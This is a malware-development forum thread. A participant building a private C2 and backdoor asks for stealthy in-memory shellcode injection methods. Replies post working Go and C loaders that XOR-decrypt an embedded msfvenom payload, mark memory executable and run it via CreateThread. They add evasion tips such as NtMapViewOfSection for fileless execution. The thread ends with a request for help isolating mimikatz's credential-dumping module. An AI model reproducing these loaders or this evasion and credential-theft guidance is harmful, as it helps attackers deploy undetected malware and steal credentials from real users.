Malware Development C2 and Backdoor

[Str0ng]

Hello everyone, I have a c2 that I have been programming for a while, it has many functions, traffic encryption with a random key per request, http or https as transport, generating shellcode, adding Word, Excel, etc. icons to Windows payloads, it is multiplatform, the question is, I want the opinion of all malware experts, if someone knows or recommends a good technique to inject the shellcode into memory that is not the traditional one, such as VirtualAlloc, VirtualProtect, WriteProcessMemory, etc and only using in memory techniques without read files, for example decrypting the shellcode using xor or aes in memory and inject after it., thank you and I await your recommendations or advice !

package main

/*
  simple shellcode loader example
*/
import (
    "unsafe"
    "syscall"
)

var  (
      kernel32          = syscall.MustLoadDLL("kernel32.dll")
      VirtualProtect    = kernel32.MustFindProc("VirtualProtect")
)

func main() {
     old         := ""
     shellcode   := []byte{}
     VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&old)))
     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}

 

[DrClinker]

https://github.com/0xda568/IconJector it requires a dll on the disk, but the thing is interesting

 

[Apocalypse]

Секции

 

[Str0ng]

Секции

PE sections ?

 

[voldemort]

You can do it in Go also it is pretty much similar

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>


//msfvenom shellcode to start calc.exe
unsigned char encryptedShellcode[] = {
    0xfd,0x4a,0x80,0xe0,0xf5,0xed,0xc1,0x02,0x03,0x04,0x44,0x54,0x40,0x52,0x51,0x55,0x53,0x4d,0x30,0xd0,0x66,0x4c,0x8e,0x57,0x61,0x4a,0x88,0x56,0x1d,0x4d,0x8a,0x50,0x23,0x4c,0x8e,0x77,0x51,0x4a,0x0c,0xb3,0x4f,0x4f,0x4c,0x33,0xca,0x4c,0x34,0xc5,0xad,0x3e,0x62,0x78,0x07,0x29,0x21,0x43,0xc2,0xcd,0x08,0x44,0x00,0xc3,0xe1,0xe9,0x57,0x44,0x50,0x4a,0x88,0x56,0x25,0x8e,0x43,0x3e,0x4b,0x05,0xd5,0x8e,0x81,0x8a,0x03,0x04,0x05,0x4d,0x84,0xc2,0x77,0x63,0x4d,0x04,0xd1,0x52,0x88,0x4c,0x1d,0x41,0x8a,0x42,0x23,0x4d,0x04,0xd5,0xe2,0x54,0x4b,0xfb,0xcc,0x44,0x8a,0x36,0x8b,0x4c,0x04,0xd3,0x4c,0x33,0xca,0x4c,0x34,0xc5,0xad,0x43,0xc2,0xcd,0x08,0x44,0x00,0xc3,0x3b,0xe4,0x70,0xf4,0x4d,0x01,0x4f,0x20,0x0d,0x40,0x38,0xd3,0x76,0xdc,0x5d,0x41,0x8a,0x42,0x27,0x4d,0x04,0xd5,0x67,0x43,0x88,0x08,0x4d,0x41,0x8a,0x42,0x1f,0x4d,0x04,0xd5,0x40,0x89,0x07,0x8c,0x4d,0x04,0xd1,0x43,0x5b,0x45,0x5d,0x5b,0x58,0x58,0x42,0x5c,0x44,0x5c,0x40,0x58,0x4b,0x87,0xe9,0x25,0x40,0x50,0xfc,0xe4,0x5d,0x44,0x58,0x58,0x4b,0x8f,0x17,0xec,0x56,0xfd,0xfc,0xfb,0x58,0x4d,0xbb,0x03,0x03,0x04,0x05,0x05,0x01,0x02,0x03,0x4c,0x88,0x88,0x00,0x03,0x03,0x04,0x44,0xbf,0x30,0x89,0x6c,0x83,0xfa,0xd0,0xba,0xe2,0x1e,0x2e,0x0f,0x44,0xbb,0xa4,0x96,0xb9,0x98,0xfa,0xd4,0x4a,0x80,0xc0,0x2d,0x39,0x07,0x7e,0x09,0x84,0xfe,0xe5,0x74,0x07,0xb8,0x43,0x16,0x77,0x6e,0x68,0x03,0x5d,0x44,0x8c,0xdb,0xfd,0xd6,0x67,0x64,0x69,0x62,0x02
};


void XorByInputKey(unsigned char *pShellcode, size_t sShellcodeSize, unsigned char *pKey, size_t sKeySize);

int main(int argc, char* argv[]) {
    unsigned char key[] = { 0x01, 0x02, 0x03, 0x04, 0x05 };
    size_t keySize = sizeof(key) / sizeof(key[0]);
    PBYTE       pDeobfuscatedPayload  = NULL;
   // SIZE_T      sDeobfuscatedSize     =    0;

    printf("[i] Injecting Shellcode The Local Process Of Pid: %d \n", GetCurrentProcessId());
    printf("[#] Press <Enter> To Decrypt ... ");
    getchar();

    printf("[i] Decrypting ...");
   
    shellcode = XorByInputKey(encryptedShellcode, sizeof(encryptedShellcode), key, keySize);

    printf("[+] DONE !\n");
    SIZE_T sDeobfuscatedSize = sizeof(shellcode);
    printf("[i] Deobfuscated Payload At : 0x%p Of Size : %d \n", shellcode, sDeobfuscatedSize);

    printf("[#] Press <Enter> To Allocate ... ");
    getchar();
    PVOID pShellcodeAddress = VirtualAlloc(NULL, sDeobfuscatedSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    if (pShellcodeAddress == NULL) {
        printf("[!] VirtualAlloc Failed With Error : %d \n", GetLastError());
        return -1;
    }
    printf("[i] Allocated Memory At : 0x%p \n", pShellcodeAddress);

    printf("[#] Press <Enter> To Write Payload ... ");
    getchar();
    memcpy(pShellcodeAddress, shellcode, sDeobfuscatedSize);
    memset(encryptedShellcode, 0, sDeobfuscatedSize);


    DWORD dwOldProtection = 0;

    if (!VirtualProtect(pShellcodeAddress, sDeobfuscatedSize, PAGE_EXECUTE_READWRITE, &dwOldProtection)) {
        printf("[!] VirtualProtect Failed With Error : %d \n", GetLastError());
        return -1;
    }

    printf("[#] Press <Enter> To Run ... ");
    getchar();
    if (CreateThread(NULL, 0, pShellcodeAddress, NULL, 0, NULL) == NULL) {
        printf("[!] CreateThread Failed With Error : %d \n", GetLastError());
        return -1;
    }

    HeapFree(GetProcessHeap(), 0, pShellcodeAddress);
    printf("[#] Press <Enter> To Quit ... ");
    getchar();
    return 0;
}


unsigned char * XorByInputKey(unsigned char *pShellcode, size_t sShellcodeSize,unsigned char *pKey , size_t sKeySize) {
    for (size_t i = 0, j = 0; i < sShellcodeSize; i++, j++) {
        if (j > sKeySize){
            j = 0;
        }
        pShellcode[i] = pShellcode[i] ^ pKey[j];
    }
    return pShellcode;
}

xor encryption not as good as aes but it can be useful I suggest using aes for executing the shellcode we have used CreateThread winapi function you can use also function pointer but I don't recommend it because it will terminate the program as soon as the shell code executed

 

[xChimera]

You can do it in Go also it is pretty much similar

Хорошо тебе наверное освобождать память, выделенную VirtualAlloc при помощи HeapFree ...

 

[voldemort]

да, мы сделали это

Хорошо тебе наверное освобождать память, выделенную VirtualAlloc при помощи HeapFree ...

HeapFree(GetProcessHeap(), 0, pShellcodeAddress); <=====

 

[xChimera]

да, мы сделали это

HeapFree(GetProcessHeap(), 0, pShellcodeAddress); <=====

PVOID pShellcodeAddress = VirtualAlloc(NULL, sDeobfuscatedSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); <=====

ruskiy ne ponimaesh ?

 

[Str0ng]

this work perfect but i am looking new method or not normally used method for inject or load shellcode

package main

import (
    "fmt"
    "unsafe"
    "syscall"
    "io/ioutil"
)

var  (
      kernel32          = syscall.MustLoadDLL("kernel32.dll")
      VirtualProtect    = kernel32.MustFindProc("VirtualProtect")
      CryptedShellcode  = []byte{126}
      CryptedShellcodeKey = []byte{22}
)

/*   decrypt xor shellcode and return as byte array */
func DecryptXORShellode(ShellCodeWithXor []byte, XORKey []byte) []byte {
     DecryptedShellcode := []byte{}
     for _,b := range ShellCodeWithXor {
         DecryptedShellcode = append(DecryptedShellcode, b ^ XORKey[0])
     }
     return DecryptedShellcode
}

func main() {
     shellcode := DecryptXORShellode(CryptedShellcode, CryptedShellcodeKey)
     _,_,e := VirtualProtect.Call(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode)), uintptr(0x40), uintptr(unsafe.Pointer(&[]byte{255}[0])))
     fmt.Println(e)
     syscall.Syscall(uintptr(unsafe.Pointer(&shellcode[0])), uintptr(0), uintptr(0), uintptr(0), uintptr(0))
}

 

[Str0ng]

Looks like you're delving deep into shellcode injection! If you're avoiding traditional APIs, consider using `NtMapViewOfSection` or `ZwMapViewOfSection`. They are often used for fileless malware and can help keep things in-memory. Another technique worth exploring is leveraging callbacks or hooks in system processes. Also, staying in user mode and avoiding detection is key—obfuscate your shellcode and decryption techniques.

thanks yes I'm developing a private multiplatform c2, and it also has loader, backdoor, modules not yet but that's the idea,
and well I see that you have more knowledge than me maybe, so since this is it, could you have some information on how they work or compile the mimikatz modules separately, because I only want to take the sekurlsa module with the function of dumping ntlm hashes/credentials without using the rest of the mimikatz code, but I still don't know how)

i think is something like this -> https://blog.compass-security.com/2023/04/compiling-a-mimikatz-module-for-dumping-citrix-credz/